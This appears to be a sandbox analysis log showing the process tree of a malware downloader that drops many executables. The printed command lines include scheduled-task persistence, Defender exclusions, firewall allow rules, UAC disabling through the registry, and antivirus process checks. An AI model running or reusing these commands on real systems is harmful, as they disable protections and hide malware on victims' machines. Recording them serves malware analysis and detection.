                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                                                                  2⤵
                                                                                  • Drops file in Program Files directory
                                                                                  PID:4948
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x264,0x268,0x26c,0x240,0x270,0x7ff7e4745460,0x7ff7e4745470,0x7ff7e4745480
                                                                                    3⤵
                                                                                      PID:2376
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2612 /prefetch:8
                                                                                    2⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:4428
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
                                                                                    2⤵
                                                                                      PID:1580
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
                                                                                      2⤵
                                                                                        PID:1832
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
                                                                                        2⤵
                                                                                          PID:5708
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,18391864513340417987,317079921170427835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
                                                                                          2⤵
                                                                                            PID:5664
                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                          1⤵
                                                                                            PID:2700
                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                            1⤵
                                                                                              PID:5496
                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                              1⤵
                                                                                                PID:5256
                                                                                              • C:\Users\Admin\Desktop\New Text Document.exe
                                                                                                "C:\Users\Admin\Desktop\New Text Document.exe"
                                                                                                1⤵
                                                                                                • Downloads MZ/PE file
                                                                                                PID:236
                                                                                                • C:\Users\Admin\Desktop\a\updater.exe
                                                                                                  "C:\Users\Admin\Desktop\a\updater.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Drops file in System32 directory
                                                                                                  PID:5584
                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                    "schtasks" /create /tn "Runtime Broker.exe" /sc ONLOGON /tr "C:\Windows\system32\update.exe" /rl HIGHEST /f
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:5972
                                                                                                  • C:\Windows\system32\update.exe
                                                                                                    "C:\Windows\system32\update.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Drops file in System32 directory
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:540
                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                      "schtasks" /create /tn "Runtime Broker.exe" /sc ONLOGON /tr "C:\Windows\system32\update.exe" /rl HIGHEST /f
                                                                                                      4⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:1276
                                                                                                • C:\Users\Admin\Desktop\a\Discord.exe
                                                                                                  "C:\Users\Admin\Desktop\a\Discord.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3296
                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                    "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:3032
                                                                                                  • C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:2244
                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                      "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
                                                                                                      4⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:5296
                                                                                                • C:\Users\Admin\Desktop\a\noyjhoadw.exe
                                                                                                  "C:\Users\Admin\Desktop\a\noyjhoadw.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4168
                                                                                                • C:\Users\Admin\Desktop\a\build.exe
                                                                                                  "C:\Users\Admin\Desktop\a\build.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3476
                                                                                                • C:\Users\Admin\Desktop\a\fag3.exe
                                                                                                  "C:\Users\Admin\Desktop\a\fag3.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                  PID:5916
                                                                                                • C:\Users\Admin\Desktop\a\fag.exe
                                                                                                  "C:\Users\Admin\Desktop\a\fag.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3364
                                                                                                • C:\Users\Admin\Desktop\a\Server.exe
                                                                                                  "C:\Users\Admin\Desktop\a\Server.exe"
                                                                                                  2⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:5708
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                    3⤵
                                                                                                    • Drops startup file
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                    PID:2672
                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                      4⤵
                                                                                                      • Modifies Windows Firewall
                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:5952
                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                      netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                      4⤵
                                                                                                      • Modifies Windows Firewall
                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:5544
                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                      4⤵
                                                                                                      • Modifies Windows Firewall
                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:5456
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /create /sc minute /mo 1 /tn StUpdate /tr C:\Users\Admin\AppData\Local\Temp/StUpdate.exe
                                                                                                      4⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:4644
                                                                                                • C:\Users\Admin\Desktop\a\e.exe
                                                                                                  "C:\Users\Admin\Desktop\a\e.exe"
                                                                                                  2⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Drops startup file
                                                                                                  • Executes dropped EXE
                                                                                                  • Adds Run key to start application
                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:5556
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\a\e.exe'
                                                                                                    3⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:3752
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'e.exe'
                                                                                                    3⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:6036
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update(32bit).exe'
                                                                                                    3⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:4704
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update(32bit).exe'
                                                                                                    3⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:3608
                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Java Update(32bit)" /tr "C:\ProgramData\Java Update(32bit).exe"
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:628
                                                                                                • C:\Users\Admin\Desktop\a\payload.exe
                                                                                                  "C:\Users\Admin\Desktop\a\payload.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5448
                                                                                                • C:\Users\Admin\Desktop\a\abc.exe
                                                                                                  "C:\Users\Admin\Desktop\a\abc.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4468
                                                                                                • C:\Users\Admin\Desktop\a\done.exe
                                                                                                  "C:\Users\Admin\Desktop\a\done.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:1636
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "powershell.exe" Add-MpPreference -ExclusionPath "C:\gamnwzgybv"
                                                                                                    3⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:4812
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                                                                                                    3⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:4276
                                                                                                • C:\Users\Admin\Desktop\a\sampcac-loader.exe
                                                                                                  "C:\Users\Admin\Desktop\a\sampcac-loader.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:5364
                                                                                                • C:\Users\Admin\Desktop\a\Loader.exe
                                                                                                  "C:\Users\Admin\Desktop\a\Loader.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:6104
                                                                                                • C:\Users\Admin\Desktop\a\15.exe
                                                                                                  "C:\Users\Admin\Desktop\a\15.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3756
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 396
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:4636
                                                                                                • C:\Users\Admin\Desktop\a\traf.exe
                                                                                                  "C:\Users\Admin\Desktop\a\traf.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Maps connected drives based on registry
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:5240
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    explorer.exe
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:1748
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 1440
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:2800
                                                                                                • C:\Users\Admin\Desktop\a\sel1.exe
                                                                                                  "C:\Users\Admin\Desktop\a\sel1.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Maps connected drives based on registry
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:4296
                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                    svchost.exe
                                                                                                    3⤵
                                                                                                    • Adds policy Run key to start application
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3716
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 892
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:3664
                                                                                                • C:\Users\Admin\Desktop\a\vapo.exe
                                                                                                  "C:\Users\Admin\Desktop\a\vapo.exe"
                                                                                                  2⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  PID:1368
                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "vapo" /tr "C:\Users\Admin\AppData\Roaming\vapo.exe"
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:5900
                                                                                                • C:\Users\Admin\Desktop\a\amada2.exe
                                                                                                  "C:\Users\Admin\Desktop\a\amada2.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • NTFS ADS
                                                                                                  PID:4772
                                                                                                  • \??\c:\programdata\1be588a5b7\gdsun.exe
                                                                                                    c:\programdata\1be588a5b7\gdsun.exe
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:1864
                                                                                                    • C:\Windows\SysWOW64\REG.exe
                                                                                                      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\1be588a5b7
                                                                                                      4⤵
                                                                                                        PID:1424
                                                                                                  • C:\Users\Admin\Desktop\a\1.exe
                                                                                                    "C:\Users\Admin\Desktop\a\1.exe"
                                                                                                    2⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • Drops file in Windows directory
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:4040
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4608
                                                                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                                                                        tasklist
                                                                                                        4⤵
                                                                                                        • Enumerates processes with tasklist
                                                                                                        PID:3404
                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                        findstr /I "opssvc wrsa"
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:4556
                                                                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                                                                        tasklist
                                                                                                        4⤵
                                                                                                        • Enumerates processes with tasklist
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3004
                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1632
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c md 634977
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:4792
                                                                                                      • C:\Windows\SysWOW64\extrac32.exe
                                                                                                        extrac32 /Y /E Gtk
                                                                                                        4⤵
                                                                                                          PID:4588
                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                          findstr /V "Constitution" Wagon
                                                                                                          4⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:3688
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com
                                                                                                          4⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:1680
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q
                                                                                                          4⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:3904
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com
                                                                                                          Surrey.com Q
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                          PID:3448
                                                                                                        • C:\Windows\SysWOW64\choice.exe
                                                                                                          choice /d y /t 5
                                                                                                          4⤵
                                                                                                            PID:1556
                                                                                                      • C:\Users\Admin\Desktop\a\Update.exe
                                                                                                        "C:\Users\Admin\Desktop\a\Update.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5808
                                                                                                      • C:\Users\Admin\Desktop\a\test.exe
                                                                                                        "C:\Users\Admin\Desktop\a\test.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5192
                                                                                                      • C:\Users\Admin\Desktop\a\BQEHIQAG.exe
                                                                                                        "C:\Users\Admin\Desktop\a\BQEHIQAG.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5324
                                                                                                        • C:\Windows\Temp\{07FFC4C3-B82C-4823-9358-4AF768913A0B}\.cr\BQEHIQAG.exe
                                                                                                          "C:\Windows\Temp\{07FFC4C3-B82C-4823-9358-4AF768913A0B}\.cr\BQEHIQAG.exe" -burn.clean.room="C:\Users\Admin\Desktop\a\BQEHIQAG.exe" -burn.filehandle.attached=572 -burn.filehandle.self=576
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4660
                                                                                                          • C:\Windows\Temp\{F03757D8-DC03-494F-B2DA-1AC5CBEEA057}\.ba\DBDownloader.exe
                                                                                                            C:\Windows\Temp\{F03757D8-DC03-494F-B2DA-1AC5CBEEA057}\.ba\DBDownloader.exe
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:3032
                                                                                                            • C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe
                                                                                                              C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:2184
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\SysWOW64\cmd.exe
                                                                                                                6⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:4908
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  7⤵
                                                                                                                    PID:3220
                                                                                                        • C:\Users\Admin\Desktop\a\rh_0-8_2025-01-23_15-05.exe
                                                                                                          "C:\Users\Admin\Desktop\a\rh_0-8_2025-01-23_15-05.exe"
                                                                                                          2⤵
                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                          • Executes dropped EXE
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:1764
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 416
                                                                                                            3⤵
                                                                                                            • Program crash
                                                                                                            PID:2224
                                                                                                        • C:\Users\Admin\Desktop\a\ApiUpdater.exe
                                                                                                          "C:\Users\Admin\Desktop\a\ApiUpdater.exe"
                                                                                                          2⤵
                                                                                                          • Adds policy Run key to start application
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          • Adds Run key to start application
                                                                                                          • Modifies registry class
                                                                                                          PID:5176
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:3864
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                              4⤵
                                                                                                              • UAC bypass
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Modifies registry key
                                                                                                              PID:3792
                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
                                                                                                            3⤵
                                                                                                            • Checks computer location settings
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:3116
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"
                                                                                                              4⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:4188
                                                                                                              • C:\ProgramData\Bitdefender\$77-Bitdefender.exe
                                                                                                                C:\ProgramData\Bitdefender\$77-Bitdefender.exe
                                                                                                                5⤵
                                                                                                                • Adds policy Run key to start application
                                                                                                                • Executes dropped EXE
                                                                                                                • Adds Run key to start application
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:4080
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                  6⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:4484
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                    7⤵
                                                                                                                    • UAC bypass
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Modifies registry key
                                                                                                                    PID:4584
                                                                                                                • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                                                                                                  "c:\program files (x86)\internet explorer\iexplore.exe"
                                                                                                                  6⤵
                                                                                                                    PID:5648
                                                                                                          • C:\Users\Admin\Desktop\a\windows.exe
                                                                                                            "C:\Users\Admin\Desktop\a\windows.exe"
                                                                                                            2⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:5432
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
                                                                                                              3⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:5384
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
                                                                                                                4⤵
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:1556
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp77F3.tmp.bat""
                                                                                                              3⤵
                                                                                                                PID:5028
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout 3
                                                                                                                  4⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:3220
                                                                                                                • C:\Users\Admin\AppData\Roaming\system.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\system.exe"
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5292
                                                                                                            • C:\Users\Admin\Desktop\a\T.exe
                                                                                                              "C:\Users\Admin\Desktop\a\T.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:3828
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                                                                                                                "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\Desktop\a\T.exe' 'C:\ProgramData\1be588a5b7\T.exe' -Force
                                                                                                                3⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:5388
                                                                                                            • C:\Users\Admin\Desktop\a\Enalib.exe
                                                                                                              "C:\Users\Admin\Desktop\a\Enalib.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:396
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                                                                                                                "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\Desktop\a\Enalib.exe' 'C:\ProgramData\1be588a5b7\Enalib.exe' -Force
                                                                                                                3⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:6116
                                                                                                            • C:\Users\Admin\Desktop\a\36.exe
                                                                                                              "C:\Users\Admin\Desktop\a\36.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5820
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 396
                                                                                                                3⤵
                                                                                                                • Program crash
                                                                                                                PID:5676
                                                                                                            • C:\Users\Admin\Desktop\a\access.exe
                                                                                                              "C:\Users\Admin\Desktop\a\access.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:3656
